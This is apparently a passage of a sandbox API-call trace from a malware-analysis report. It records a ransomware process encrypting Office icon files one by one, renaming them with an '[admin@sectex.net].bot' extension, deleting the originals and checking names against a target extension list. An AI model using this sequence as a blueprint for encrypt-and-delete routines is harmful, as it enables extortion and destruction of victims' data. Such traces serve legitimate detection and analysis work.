	[0163.883] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0163.884] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.884] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.884] SetEndOfFile (hFile=0x37c) returned 1
	[0163.884] CloseHandle (hObject=0x37c) returned 1
	[0163.884] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.884] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.887] CloseHandle (hObject=0x3e8) returned 1
	[0163.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico")) returned 1
	[0163.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.888] lstrlenW (lpString=".doc") returned 4
	[0163.888] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.888] lstrlenW (lpString=".docx") returned 5
	[0163.888] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.888] lstrlenW (lpString=".pdf") returned 4
	[0163.888] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.888] lstrlenW (lpString=".xls") returned 4
	[0163.888] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.888] lstrlenW (lpString=".xlsx") returned 5
	[0163.888] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.888] lstrlenW (lpString=".ppt") returned 4
	[0163.888] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.888] lstrlenW (lpString=".zip") returned 4
	[0163.888] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.888] lstrlenW (lpString=".rar") returned 4
	[0163.888] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.888] lstrlenW (lpString=".bz2") returned 4
	[0163.888] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.888] lstrlenW (lpString=".7z") returned 3
	[0163.888] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.888] lstrlenW (lpString=".dbf") returned 4
	[0163.888] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.888] lstrlenW (lpString=".1cd") returned 4
	[0163.888] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.888] lstrlenW (lpString=".jpg") returned 4
	[0163.888] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.889] lstrlenW (lpString=".doc") returned 4
	[0163.889] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.889] lstrlenW (lpString=".docx") returned 5
	[0163.889] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.889] lstrlenW (lpString=".pdf") returned 4
	[0163.889] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.889] lstrlenW (lpString=".xls") returned 4
	[0163.889] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.889] lstrlenW (lpString=".xlsx") returned 5
	[0163.889] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.889] lstrlenW (lpString=".ppt") returned 4
	[0163.889] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.889] lstrlenW (lpString=".zip") returned 4
	[0163.889] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.889] lstrlenW (lpString=".rar") returned 4
	[0163.889] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.889] lstrlenW (lpString=".bz2") returned 4
	[0163.889] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.889] lstrlenW (lpString=".7z") returned 3
	[0163.889] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.889] lstrlenW (lpString=".dbf") returned 4
	[0163.889] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.889] lstrlenW (lpString=".1cd") returned 4
	[0163.889] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO") returned 66
	[0163.889] lstrlenW (lpString=".jpg") returned 4
	[0163.889] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.890] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.890] lstrlenW (lpString="SCDRESNS.ICO") returned 12
	[0163.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.080] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0164.080] CloseHandle (hObject=0x3d0) returned 1
	[0164.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico")) returned 0x20
	[0164.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.080] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.080] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.081] GetLastError () returned 0x0
	[0164.081] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0164.174] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0164.215] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.215] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.215] SetEndOfFile (hFile=0x398) returned 1
	[0164.243] CloseHandle (hObject=0x398) returned 1
	[0164.243] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.243] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.246] CloseHandle (hObject=0x3d0) returned 1
	[0164.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico")) returned 1
	[0164.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.247] lstrlenW (lpString=".doc") returned 4
	[0164.247] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.247] lstrlenW (lpString=".docx") returned 5
	[0164.247] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.247] lstrlenW (lpString=".pdf") returned 4
	[0164.247] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.247] lstrlenW (lpString=".xls") returned 4
	[0164.247] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.247] lstrlenW (lpString=".xlsx") returned 5
	[0164.247] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.247] lstrlenW (lpString=".ppt") returned 4
	[0164.247] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.247] lstrlenW (lpString=".zip") returned 4
	[0164.247] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString=".rar") returned 4
	[0164.248] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString=".bz2") returned 4
	[0164.248] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.248] lstrlenW (lpString=".7z") returned 3
	[0164.248] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.248] lstrlenW (lpString=".dbf") returned 4
	[0164.248] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.248] lstrlenW (lpString=".1cd") returned 4
	[0164.248] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.248] lstrlenW (lpString=".jpg") returned 4
	[0164.248] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.248] lstrlenW (lpString=".doc") returned 4
	[0164.248] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.248] lstrlenW (lpString=".docx") returned 5
	[0164.248] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.248] lstrlenW (lpString=".pdf") returned 4
	[0164.248] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString=".xls") returned 4
	[0164.248] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString=".xlsx") returned 5
	[0164.248] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.248] lstrlenW (lpString=".ppt") returned 4
	[0164.248] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.248] lstrlenW (lpString=".zip") returned 4
	[0164.248] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.248] lstrlenW (lpString=".rar") returned 4
	[0164.248] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.249] lstrlenW (lpString=".bz2") returned 4
	[0164.249] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.249] lstrlenW (lpString=".7z") returned 3
	[0164.249] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.249] lstrlenW (lpString=".dbf") returned 4
	[0164.249] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.249] lstrlenW (lpString=".1cd") returned 4
	[0164.249] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO") returned 66
	[0164.249] lstrlenW (lpString=".jpg") returned 4
	[0164.249] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.249] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.249] lstrlenW (lpString="SECRECL.ICO") returned 11
	[0164.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.250] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0164.250] CloseHandle (hObject=0x3d0) returned 1
	[0164.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico")) returned 0x20
	[0164.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.250] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.251] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.251] GetLastError () returned 0x0
	[0164.251] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0164.255] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0164.256] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.256] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0164.256] SetEndOfFile (hFile=0x398) returned 1
	[0164.256] CloseHandle (hObject=0x398) returned 1
	[0164.256] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.256] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.258] CloseHandle (hObject=0x3d0) returned 1
	[0164.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico")) returned 1
	[0164.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.261] lstrlenW (lpString=".doc") returned 4
	[0164.261] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.261] lstrlenW (lpString=".docx") returned 5
	[0164.261] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0164.261] lstrlenW (lpString=".pdf") returned 4
	[0164.261] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.261] lstrlenW (lpString=".xls") returned 4
	[0164.261] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.261] lstrlenW (lpString=".xlsx") returned 5
	[0164.261] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0164.261] lstrlenW (lpString=".ppt") returned 4
	[0164.262] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.262] lstrlenW (lpString=".zip") returned 4
	[0164.262] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.262] lstrlenW (lpString=".rar") returned 4
	[0164.262] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.262] lstrlenW (lpString=".bz2") returned 4
	[0164.262] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.262] lstrlenW (lpString=".7z") returned 3
	[0164.262] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.262] lstrlenW (lpString=".dbf") returned 4
	[0164.262] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.262] lstrlenW (lpString=".1cd") returned 4
	[0164.262] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.262] lstrlenW (lpString=".jpg") returned 4
	[0164.262] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.262] lstrlenW (lpString=".doc") returned 4
	[0164.262] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.262] lstrlenW (lpString=".docx") returned 5
	[0164.262] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0164.262] lstrlenW (lpString=".pdf") returned 4
	[0164.262] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.262] lstrlenW (lpString=".xls") returned 4
	[0164.262] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.262] lstrlenW (lpString=".xlsx") returned 5
	[0164.262] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0164.262] lstrlenW (lpString=".ppt") returned 4
	[0164.262] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.263] lstrlenW (lpString=".zip") returned 4
	[0164.263] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.263] lstrlenW (lpString=".rar") returned 4
	[0164.263] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.263] lstrlenW (lpString=".bz2") returned 4
	[0164.263] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.263] lstrlenW (lpString=".7z") returned 3
	[0164.263] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.263] lstrlenW (lpString=".dbf") returned 4
	[0164.263] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.263] lstrlenW (lpString=".1cd") returned 4
	[0164.263] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO") returned 65
	[0164.263] lstrlenW (lpString=".jpg") returned 4
	[0164.263] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.263] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.263] lstrlenW (lpString="SECRECS.ICO") returned 11
	[0164.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.264] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0164.264] CloseHandle (hObject=0x3d0) returned 1
	[0164.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico")) returned 0x20
	[0164.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.264] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.264] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.265] GetLastError () returned 0x0
	[0164.265] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
